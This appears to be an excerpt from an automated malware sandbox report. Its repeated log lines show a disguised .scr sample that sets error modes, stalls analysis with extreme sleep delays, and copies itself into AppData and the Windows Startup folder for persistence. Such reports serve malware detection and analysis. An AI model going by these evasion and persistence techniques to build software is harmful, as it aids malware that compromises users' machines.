Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep count: 32 > 30Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -29514790517935264s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -599891s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 6764Thread sleep count: 1738 > 30Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 6764Thread sleep count: 7970 > 30Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -599781s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -599672s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -599547s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -599406s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -599297s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -599188s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -599063s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -598937s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -598828s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -598719s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -598605s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -598485s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -598373s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -598259s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -598141s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -598030s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -597922s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -597813s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -597688s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -597563s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -597438s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -597327s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -597219s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -597094s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -596984s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -596875s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -596765s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -596656s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -596547s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -596438s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -596313s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -596203s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -596094s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -595969s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -595860s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -595746s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -595637s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -595516s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -595406s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -595297s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -595187s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -595078s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -594969s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -594860s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -594735s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -594610s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -594485s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -594360s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe TID: 2364Thread sleep time: -594235s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr TID: 7244Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr TID: 7536Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr TID: 7732Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr TID: 7800Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 599891Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 599781Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 599672Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 599547Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 599406Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 599297Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 599188Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 599063Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 598937Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 598828Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 598719Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 598605Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 598485Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 598373Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 598259Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 598141Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 598030Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 597922Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 597813Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 597688Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 597563Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 597438Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 597327Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 597219Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 597094Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 596984Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 596875Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 596765Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 596656Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 596547Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 596438Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 596313Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 596203Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 596094Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 595969Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 595860Jump to behavior
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeThread delayed: delay time: 595746Jump to behavior
